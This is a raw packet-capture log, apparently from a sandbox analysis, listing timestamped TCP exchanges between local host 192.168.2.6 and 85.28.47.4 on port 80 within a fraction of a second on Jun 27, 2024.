                                                                Jun 27, 2024 05:58:12.141832113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222095966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222172022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222181082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222223043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222254038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222286940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222297907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222328901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222342014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222388029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222397089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222446918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222479105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222512960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222524881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222537994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222570896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222580910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222603083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222614050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222636938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222645998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222675085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222688913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222733974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222739935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222773075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222781897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222805977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222819090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222841024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222848892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222873926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222882032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222908020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222910881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222940922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222946882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.222974062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.222980022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223012924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223012924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223054886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223208904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223241091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223253012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223277092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223290920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223310947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223316908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223344088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223356009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223376989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223388910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223411083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223417997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223444939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223452091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223476887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223495960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223510027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223511934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223543882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223546982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223578930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223586082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223617077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223802090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223835945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223850965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223866940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223870993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223901033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223912001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223934889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223942041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.223968029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.223977089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224004984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224011898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224036932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224045992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224070072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224080086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224103928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224112034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224138975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224147081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224174023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224181890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224209070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224225044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224241018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224241018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224275112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224281073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224311113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224318027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224354982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224649906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224683046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224700928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224715948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224734068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224745989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224772930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224778891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224795103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224813938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224816084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224848032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224853039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224883080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224886894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224914074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224946976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224953890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.224980116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.224988937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225016117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225023031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225049973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225064039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225084066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225085974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225117922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225127935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225152969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225155115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225187063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225208998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225222111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225222111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225255966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225266933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225298882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225549936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225583076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225596905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225615025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225619078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225649118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225650072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225682020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225688934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225714922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225723028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225749016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225754976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225784063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225797892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225819111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225824118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225855112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225862026 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225888014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225898027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225922108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225936890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225958109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.225966930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.225991964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226002932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226026058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226032019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226059914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226063967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226094007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226099014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226131916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226140022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226169109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226515055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226547956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226571083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226581097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226583958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226614952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226623058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226648092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226653099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226680994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226686001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226715088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226717949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226743937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226747036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226775885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226780891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226809978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226811886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226840973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226847887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226872921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226877928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226907015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226908922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226941109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226944923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.226974964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.226999044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227006912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227015018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227046967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227050066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227092981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227412939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227446079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227473021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227478027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227484941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227519035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227530003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227577925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227591038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227612019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227621078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227648020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227653027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.227682114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.227715015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228545904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228584051 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228602886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228607893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228637934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228650093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228682041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228722095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228754997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228764057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228790045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228802919 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228822947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228832960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228861094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.228878975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.228908062 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.308964014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.308996916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309034109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309050083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309087992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309087992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309092045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309127092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309137106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309164047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309170961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309200048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309207916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309243917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309310913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309345961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309360981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309408903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309410095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309444904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309459925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309479952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309494019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309514999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309528112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309566975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309597969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309604883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309614897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309642076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309648037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309690952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309758902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309793949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309811115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309842110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309844017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309878111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309891939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309915066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.309927940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.309963942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310038090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310071945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310089111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310106993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310116053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310142040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310157061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310178995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310189962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310213089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310228109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310249090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310264111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310295105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310460091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310492992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310511112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310528040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310540915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310564041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310576916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310601950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310611963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310636997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310650110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310671091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310687065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310704947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310719967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310739994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310753107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310770035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310791016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310805082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310812950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310841084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310853004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310874939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310887098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310911894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310924053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310946941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.310959101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.310993910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311165094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311198950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311219931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311233997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311235905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311266899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311284065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311300993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311316967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311335087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311348915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311369896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311384916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.311404943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.311424017 CEST4971180192.168.2.685.28.47.4
